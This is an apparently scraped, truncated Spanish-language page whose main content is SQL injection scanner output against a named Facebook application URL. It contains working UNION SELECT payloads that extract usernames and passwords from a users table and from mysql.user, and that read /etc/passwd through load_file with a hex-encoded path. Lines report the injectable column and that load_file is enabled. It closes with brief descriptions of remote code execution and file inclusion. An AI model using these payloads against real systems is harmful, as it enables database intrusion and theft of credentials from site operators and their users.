Nada
http://apps.facebook.com/naslovi/thread.php?thread_id=-127391+Union+Select+1,2,password,username,5,6,7,8,9+From+users--http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,concat(Host,0x3a,User,0x3a,Password),null,5,6,7,8,9+from+mysql.user--http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9--
[+] Bug Found in: 9
http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
vuln in num/s: |3|4|---------------------------------------------------------------------------------------------
[+] MySQL Database Found:
http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+mysql.user--
[+] Columns defaultin mysql.user: Host,User,Password
-------------------------------
[+] Information_Schema Database Found:http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+information_schema.tables--
[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME
---------------
[+] Columns default in information_schema.columns:TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME
-------------------------------
[+] load_file(): ENABLED
http://apps.facebook.com/naslovi/thread.php?thread_id=-1+UNION+SELECT+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9---------------------------------
Remote Code Execution (RCE): Mediante ejecución de código remoto, es posible manejar arbitrariamente una conexión a la base de datos y de esta forma obtener y/o modificarlos datos que nos interesan. Esta técnica podría permitir al atacante tener un control total sobre la base de datos del usuario en cuestión. Podemos ejecutar comandos como mysqldump o pg_dump en elcaso de mysql o postgres, respectivamente. Tambien podemos ejecutar código php usando el la interfáz de línea de comandos (php-cli), python, perl, etc.
Local|Remote File Include (L|RCI): Incluyendo...
Regístrate para leer el documento completo.